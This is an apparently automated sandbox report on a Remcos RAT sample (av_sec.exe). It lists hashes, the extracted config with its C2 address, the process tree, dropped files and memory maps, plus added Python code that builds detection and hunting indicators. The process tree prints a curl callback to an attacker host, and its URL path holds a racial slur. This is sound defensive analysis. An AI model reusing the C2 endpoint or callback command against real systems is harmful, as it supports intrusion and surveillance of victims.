Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64
    arch:x86
    image:win10v2004-20240412-en
    locale:en-us
    os:windows10-2004-x64
    system
  • submitted
    22-04-2024 11:56

General

  • Target

    av_sec.exe

  • Size

    11.2MB

  • MD5

    ab2c5633a45550670bca99f5cb82310c

  • SHA1

    1b41983e38999ab3dcbad4a74cf2c7bf6ef9711e

  • SHA256

    3bcf561a6a414a306a3196ca7174fd99b966faacb8f0ce4fae4bc72d32a4aebf

  • SHA512

    80c7f67c87aebabbaef79828d5f269229d6218ba12abb8473e71c95d9fe9e967ca288c1dcb97d2d97f67946b9350923318e298c2d7a276b25877b2c092bc7ec9

  • SSDEEP

    196608:cz97cMnvqx44EpYRPY4jTrcWrYdTjBI/TY0rA1q:k9wIvqx4xYRPYirxkZ6/j

Score
10/10

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

178.33.57.155:443

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-PM1AI7

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5
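The extracted config above is only useful if it is turned into indicators that respect what the build actually does: with install_flag, keylog_flag and screenshot_flag all false, the copy path, keylog file and screenshot folder are never written, so the mutex and the C2 endpoint are the indicators that remain. The following is an added example, not part of the report: CONFIG copies the fields shown above, the flow log lines and mutant names are constructed, and the rule that each flag gates its artifact is an assumption drawn from the flag names.

```python
"""Turn the extracted Remcos config into hunt indicators and run them over
telemetry. Added example, not part of the report: CONFIG copies fields shown
above, FLOWS and MUTANTS are constructed sample lines."""

# Subset of the extracted config (values as reported).
CONFIG = {
    "c2": ["178.33.57.155:443"],
    "mutex": "Rmc-PM1AI7",
    "install_flag": False,
    "copy_folder": "Remcos",
    "copy_file": "remcos.exe",
    "keylog_flag": False,
    "keylog_folder": "remcos",
    "keylog_file": "logs.dat",
    "screenshot_flag": False,
    "screenshot_path": "%AppData%",
    "screenshot_folder": "Screenshots",
}


def hunt_indicators(cfg):
    """Derive indicators, emitting file artifacts only when the flag that
    enables them is set. Assumption (from the flag names): install_flag gates
    the self-copy, keylog_flag the keylog file, screenshot_flag the folder.
    For this build all three are false, so mutex and C2 are what remains."""
    ind = {"mutex": cfg["mutex"], "c2": set(), "path_suffixes": []}
    for hp in cfg["c2"]:
        host, _, port = hp.rpartition(":")
        ind["c2"].add((host, int(port)))
    if cfg["install_flag"]:
        ind["path_suffixes"].append("\\" + cfg["copy_folder"] + "\\" + cfg["copy_file"])
    if cfg["keylog_flag"]:
        ind["path_suffixes"].append("\\" + cfg["keylog_folder"] + "\\" + cfg["keylog_file"])
    if cfg["screenshot_flag"]:
        ind["path_suffixes"].append(cfg["screenshot_path"] + "\\" + cfg["screenshot_folder"])
    return ind


# Constructed flow log: ts src dst dport proto. The 94.156.66.107:9000 line is
# the VBS webhook callback from the process tree; it is not in the Remcos config,
# so config-derived indicators alone will not flag it.
FLOWS = """\
1713786990 10.0.0.15 178.33.57.155 443 tcp
1713786991 10.0.0.15 52.96.0.10 443 tcp
1713786992 10.0.0.15 94.156.66.107 9000 tcp
1713786993 10.0.0.15 178.33.57.155 8080 tcp
"""

# Constructed mutant names as a handle enumeration would list them.
MUTANTS = [
    r"\Sessions\1\BaseNamedObjects\SM0:2148:304:WilStaging_02",
    r"\Sessions\1\BaseNamedObjects\Rmc-PM1AI7",
    r"\BaseNamedObjects\Global\Rmc-PM1AI7",
]


def match_flows(flow_text, ind):
    """Exact host:port is 'c2'; the same host on another port is still worth a
    look ('c2-host'), since operators change ports more often than addresses."""
    c2_hosts = {h for h, _ in ind["c2"]}
    hits = []
    for line in flow_text.splitlines():
        ts, _src, dst, dport, _proto = line.split()
        dport = int(dport)
        if (dst, dport) in ind["c2"]:
            hits.append((ts, dst, dport, "c2"))
        elif dst in c2_hosts:
            hits.append((ts, dst, dport, "c2-host"))
    return hits


def match_mutants(names, ind):
    """Compare on the leaf name so session-local and Global\\ variants both match."""
    return [n for n in names if n.rsplit("\\", 1)[-1] == ind["mutex"]]


def match_paths(paths, ind):
    """Suffix match, so the indicator works whatever the install root is."""
    return [p for p in paths
            if any(p.lower().endswith(s.lower()) for s in ind["path_suffixes"])]


if __name__ == "__main__":
    ind = hunt_indicators(CONFIG)
    print(ind)
    print(match_flows(FLOWS, ind))
    print(match_mutants(MUTANTS, ind))
```

Note what the constructed flow log shows: the webhook callback to 94.156.66.107:9000 comes from the dropped VBS, not from the Remcos config, so it has to be taken from the process tree rather than from the config extractor.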

Signatures

  • Remcos

    Remcos is closed-source remote control and surveillance software.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely a geofence check.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 9 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\av_sec.exe
    "C:\Users\Admin\AppData\Local\Temp\av_sec.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2860
    • C:\Users\Admin\AppData\Local\Temp\Beaconserver4\RttHlp.exe
      C:\Users\Admin\AppData\Local\Temp\Beaconserver4\RttHlp.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2052
      • C:\Users\Admin\AppData\Roaming\Beaconserver4\RttHlp.exe
        C:\Users\Admin\AppData\Roaming\Beaconserver4\RttHlp.exe
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:2148
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\SysWOW64\cmd.exe
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:1164
          • C:\Windows\SysWOW64\explorer.exe
            C:\Windows\SysWOW64\explorer.exe
            5⤵
            • Drops file in System32 directory
            • Modifies registry class
            • Suspicious use of WriteProcessMemory
            PID:4396
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\check1.vbs"
              6⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:1392
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c curl http://94.156.66.107:9000/hooks/nigger?id=JIXWESNH
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:2132
                • C:\Windows\SysWOW64\curl.exe
                  curl http://94.156.66.107:9000/hooks/nigger?id=JIXWESNH
                  8⤵
                    PID:2860
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xnalpexzlvrzcykqtzz.vbs"
                6⤵
                  PID:1944
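Two things in the tree above matter for anyone writing detection from it: the staging callback runs as WScript.exe -> cmd.exe -> curl.exe under an explorer.exe that cmd.exe started, and PID 2860 appears twice (av_sec.exe at the root, then curl.exe at the leaf), so av_sec.exe had already exited and the kernel recycled its PID. A parent lookup keyed only on PID over the whole log will therefore attach RttHlp.exe to curl.exe. The following is an added example, not sandbox output: the EVENTS list is constructed to mirror the tree (PIDs, images and parents as reported, with a hypothetical launcher PID 1000 for the root and the webhook path shortened), and it resolves parents in creation order so the recycled PID is handled.

```python
"""Rebuild the report's process tree from process-creation events and flag the
script-host -> cmd -> curl chain. Added example: EVENTS is constructed to mirror
the tree above; it is not sandbox output."""
from dataclasses import dataclass, field
from urllib.parse import urlparse


@dataclass
class Proc:
    seq: int              # creation order; unique even when a PID is recycled
    pid: int
    ppid: int
    image: str
    cmdline: str
    parent: "Proc | None" = None
    children: list = field(default_factory=list)

    @property
    def name(self):
        return self.image.rsplit("\\", 1)[-1].lower()


T = r"C:\Users\Admin\AppData\Local\Temp"
S = r"C:\Windows\SysWOW64"
URL = "http://94.156.66.107:9000/hooks/webhook?id=JIXWESNH"   # path altered

# (seq, pid, ppid, image, command line). PPID 1000 for the root is hypothetical.
# av_sec.exe exits early and PID 2860 is later handed to curl.exe, as reported.
EVENTS = [
    (1, 2860, 1000, rf"{T}\av_sec.exe", rf'"{T}\av_sec.exe"'),
    (2, 2052, 2860, rf"{T}\Beaconserver4\RttHlp.exe", rf"{T}\Beaconserver4\RttHlp.exe"),
    (3, 2148, 2052, r"C:\Users\Admin\AppData\Roaming\Beaconserver4\RttHlp.exe",
     r"C:\Users\Admin\AppData\Roaming\Beaconserver4\RttHlp.exe"),
    (4, 1164, 2148, rf"{S}\cmd.exe", rf"{S}\cmd.exe"),
    (5, 4396, 1164, rf"{S}\explorer.exe", rf"{S}\explorer.exe"),
    (6, 1392, 4396, rf"{S}\WScript.exe", rf'"C:\Windows\System32\WScript.exe" "{T}\check1.vbs"'),
    (7, 2132, 1392, rf"{S}\cmd.exe", rf'"C:\Windows\System32\cmd.exe" /c curl {URL}'),
    (8, 2860, 2132, rf"{S}\curl.exe", f"curl {URL}"),
    (9, 1944, 4396, rf"{S}\WScript.exe", rf'"C:\Windows\System32\WScript.exe" "{T}\xnalpexzlvrzcykqtzz.vbs"'),
]


def build_tree(events):
    """Link each process to the most recent earlier process with its PPID.
    Resolving parents in creation order is what makes PID reuse safe."""
    procs, live = [], {}
    for seq, pid, ppid, image, cmdline in sorted(events):
        p = Proc(seq, pid, ppid, image, cmdline)
        if ppid in live:
            p.parent = live[ppid]
            live[ppid].children.append(p)
        live[pid] = p            # a recycled PID now shadows the exited process
        procs.append(p)
    return procs


def naive_parent_image(events, seq):
    """The bug to avoid: a pid->image map built over the whole log resolves
    RttHlp.exe's parent (PID 2860) to curl.exe, which reused that PID later."""
    by_pid = {pid: image for _, pid, _, image, _ in events}
    ev = next(e for e in events if e[0] == seq)
    return by_pid.get(ev[2])


def ancestry(p):
    """Image names from the process itself up to the root."""
    chain = []
    while p is not None:
        chain.append(p.name)
        p = p.parent
    return chain


def find_script_to_curl(procs):
    """curl.exe with a script host somewhere above it: the staging callback in
    the report. Returns (pid, chain, host, port) per hit."""
    hits = []
    for p in procs:
        chain = ancestry(p)
        if chain[0] != "curl.exe" or not {"wscript.exe", "cscript.exe"} & set(chain[1:]):
            continue
        url = next((t for t in p.cmdline.split() if t.lower().startswith("http")), None)
        u = urlparse(url) if url else None
        hits.append((p.pid, " <- ".join(chain), u.hostname if u else None, u.port if u else None))
    return hits


def find_odd_explorer(procs):
    """explorer.exe is normally started by userinit.exe at logon (or relaunched
    by explorer itself); here cmd.exe starts it, a common injection/proxy tell."""
    normal = {"userinit.exe", "explorer.exe"}
    return [(p.pid, p.parent.name) for p in procs
            if p.name == "explorer.exe" and p.parent is not None and p.parent.name not in normal]


if __name__ == "__main__":
    tree = build_tree(EVENTS)
    for pid, chain, host, port in find_script_to_curl(tree):
        print(f"PID {pid}: {chain} -> {host}:{port}")
    print("explorer.exe with unusual parent:", find_odd_explorer(tree))
```

The same creation-order rule applies to real telemetry: Sysmon's ProcessGuid/ParentProcessGuid or the ETW process start time should be used as the key, never the bare PID.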

      Network

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\794a03f7

        Filesize

        5.5MB

        MD5

        320634072eddd5b14ddddcf0e32d6608

        SHA1

        d8db9bf00db95b25d2cd8b2c5888d250b535232b

        SHA256

        bba6f76185241df9bf477ca6c815fb4914d000489ce84f54ed17eeda199a1714

        SHA512

        8ea9e10a14de6f84041af79548a07936e84ececfdcab9c248aaab4bb80f1e387a6c421afb35e93c619698d6c93b5ebdace3b2f858910a74076c827d5e24971ff

      • C:\Users\Admin\AppData\Local\Temp\84805a5f

        Filesize

        1.2MB

        MD5

        7b3cd0605ae084b071f870e32cc5adee

        SHA1

        b65c49d3299716474dc3682f4c80ecdc290add15

        SHA256

        79423972e0c008d546bf9b83e888d99a7e62bd615033b27cbf0e69b0c31c0bb6

        SHA512

        c895d88a90b244e03238ba645e24f960e3f6658326b870cb6e03fc01c1fe993bb0880fa069c48fe87274136e1c22b0f64e42779ced6697ffe67aff9bfc40b08e

      • C:\Users\Admin\AppData\Local\Temp\Beaconserver4\Register.dll

        Filesize

        1.0MB

        MD5

        40b9628354ef4e6ef3c87934575545f4

        SHA1

        8fb5da182dea64c842953bf72fc573a74adaa155

        SHA256

        372b14fce2eb35b264f6d4aeef7987da56d951d3a09ef866cf55ed72763caa12

        SHA512

        02b0ea82efbfbe2e7308f86bfbec7a5109f3fe91d42731812d2e46aebedce50aabc565d2da9d3fbcd0f46febbff49c534419d1a91e0c14d5a80f06b74888c641

      • C:\Users\Admin\AppData\Local\Temp\Beaconserver4\RttHlp.exe

        Filesize

        135KB

        MD5

        a2d70fbab5181a509369d96b682fc641

        SHA1

        22afcdc180400c4d2b9e5a6db2b8a26bff54dd38

        SHA256

        8aed681ad8d660257c10d2f0e85ae673184055a341901643f27afc38e5ef8473

        SHA512

        219c6e7e88004fad9f4392be9a852c58fc43b7f6900e40370991427f37eaea5c18f48d2954f9479dde8bcb787345f4e292d5620add8224aec4d93d7968820b83

      • C:\Users\Admin\AppData\Local\Temp\Beaconserver4\bronzite.rpm

        Filesize

        11KB

        MD5

        6e4ffb2517b3570bf0c6766b8a0253fa

        SHA1

        2143b82dd1c8c3f4d0e0b146e65667a4e8552a9e

        SHA256

        d690d10eac73dada021f73aa41e2e5f5f41d043ec3372512e138dc2f77623f41

        SHA512

        d15317ea42fcb44a247f6300e33f14079e166b8a5bce285099b0ee21c68ce6ed753fcb8279956d27c94deabd28586fc142b1d4b3c852e0b181691dc55c58aa6f

      • C:\Users\Admin\AppData\Local\Temp\Beaconserver4\globule.jpg

        Filesize

        1.0MB

        MD5

        4b12739a07c02ef25a45d80516a87100

        SHA1

        d976238dd9a697b7c35f85d3157282dfb68f4522

        SHA256

        f003145b18b53ca237f3a0c1e7a21481c335467fe265474555dbc8e576d95fb6

        SHA512

        f91ee89bd928d6880e4c58ffdfea47cd54e3ef38b50181e3717b7cc67ca0e03d764478a34ffccb7d2ddf72f85a1d2940729c79c8d727c960db615921974b7265

      • C:\Users\Admin\AppData\Local\Temp\Beaconserver4\rtl120.bpl

        Filesize

        1.1MB

        MD5

        adf82ed333fb5567f8097c7235b0e17f

        SHA1

        e6ccaf016fc45edcdadeb40da64c207ddb33859f

        SHA256

        d6dd7a4f46f2cfde9c4eb9463b79d5ff90fc690da14672ba1da39708ee1b9b50

        SHA512

        2253c7b51317a3b5734025b6c7639105dbc81c340703718d679a00c13d40dd74ccaba1f6d04b21ee440f19e82ba680aa4b2a6a75c618aed91bd85a132be9fc92

      • C:\Users\Admin\AppData\Local\Temp\Beaconserver4\vcl120.bpl

        Filesize

        1.9MB

        MD5

        95ecaf8770cb3d948f45588fc04e0dfd

        SHA1

        49890478b975dcbb7bac20e330d9498312583f85

        SHA256

        5708ca3e0c822212494d2c4d51b2391904120cc5366adbc46e90fa9183d6b285

        SHA512

        55fa8098cbbc1503e2603f7dee57173ce429f6f5da8a00b37c79744f6063d2c46918e993712f24a42857b6ff87092fa1b4dc7c8f40483930b596824a6ffcb2bc

      • C:\Users\Admin\AppData\Local\Temp\check1.vbs

        Filesize

        146B

        MD5

        85a2ebad40c21ba1da77230265b5351f

        SHA1

        803822e08837ebda5de7dde963e4872ae2fc4c21

        SHA256

        b5c409cbb25690b000d9d36c3b5170c1e61fff3d89bdaeadf0166ae28b0fdff9

        SHA512

        77374eb3d9632c45c25c997380eab1ee338fbe659a24679b3cf28e76d67ffa71e2d2ea326181909d06970dca0e92b5528c1e7f9c866493162fd77170f87ea83a

      • C:\Users\Admin\AppData\Local\Temp\xnalpexzlvrzcykqtzz.vbs

        Filesize

        324B

        MD5

        5969db124f530f24b0e1b305ca5a8291

        SHA1

        5eb79a70cc356a20ba39913489a5cdca36f83011

        SHA256

        3a4ae3a89b9c1d79fbef06dd969b1307837c0378966c5f7ceddafb1e4660a072

        SHA512

        0297ea245560c1b5fe64f5a3cd7769ea4e9f09dfc4cc4f16c8d96c5b5d846c8982458991aa143ea5a103436a03c5e7d5b7769b2b87bca5565e856de960e2e290

      • memory/1164-71-0x0000000074CA0000-0x0000000074E1B000-memory.dmp

        Filesize

        1.5MB

      • memory/1164-65-0x0000000074CA0000-0x0000000074E1B000-memory.dmp

        Filesize

        1.5MB

      • memory/1164-74-0x0000000074CA0000-0x0000000074E1B000-memory.dmp

        Filesize

        1.5MB

      • memory/1164-72-0x0000000074CA0000-0x0000000074E1B000-memory.dmp

        Filesize

        1.5MB

      • memory/1164-69-0x00007FFD12230000-0x00007FFD12425000-memory.dmp

        Filesize

        2.0MB

      • memory/2052-46-0x0000000000400000-0x0000000000421000-memory.dmp

        Filesize

        132KB

      • memory/2052-53-0x0000000050120000-0x000000005030D000-memory.dmp

        Filesize

        1.9MB

      • memory/2052-35-0x0000000074CA0000-0x0000000074E1B000-memory.dmp

        Filesize

        1.5MB

      • memory/2052-36-0x00007FFD12230000-0x00007FFD12425000-memory.dmp

        Filesize

        2.0MB

      • memory/2052-49-0x0000000050000000-0x0000000050116000-memory.dmp

        Filesize

        1.1MB

      • memory/2148-58-0x00007FFD12230000-0x00007FFD12425000-memory.dmp

        Filesize

        2.0MB

      • memory/2148-59-0x0000000074CA0000-0x0000000074E1B000-memory.dmp

        Filesize

        1.5MB

      • memory/2148-57-0x0000000074CA0000-0x0000000074E1B000-memory.dmp

        Filesize

        1.5MB

      • memory/2148-62-0x0000000074CA0000-0x0000000074E1B000-memory.dmp

        Filesize

        1.5MB

      • memory/2148-67-0x0000000050000000-0x0000000050116000-memory.dmp

        Filesize

        1.1MB

      • memory/2860-60-0x00007FFD03090000-0x00007FFD03202000-memory.dmp

        Filesize

        1.4MB

      • memory/2860-9-0x00007FFD03090000-0x00007FFD03202000-memory.dmp

        Filesize

        1.4MB

      • memory/2860-0-0x0000000000CA0000-0x0000000001804000-memory.dmp

        Filesize

        11.4MB

      • memory/2860-14-0x00007FFD03090000-0x00007FFD03202000-memory.dmp

        Filesize

        1.4MB

      • memory/2860-22-0x00007FFD03090000-0x00007FFD03202000-memory.dmp

        Filesize

        1.4MB

      • memory/2860-7-0x00007FFD03090000-0x00007FFD03202000-memory.dmp

        Filesize

        1.4MB

      • memory/2860-1-0x0000023D38F10000-0x0000023D38F11000-memory.dmp

        Filesize

        4KB

      • memory/4396-75-0x00007FFD12230000-0x00007FFD12425000-memory.dmp

        Filesize

        2.0MB

      • memory/4396-76-0x0000000000400000-0x0000000000483000-memory.dmp

        Filesize

        524KB

      • memory/4396-78-0x00000000009E0000-0x0000000000E13000-memory.dmp

        Filesize

        4.2MB

      • memory/4396-83-0x0000000000400000-0x0000000000483000-memory.dmp

        Filesize

        524KB

      • memory/4396-87-0x0000000000400000-0x0000000000483000-memory.dmp

        Filesize

        524KB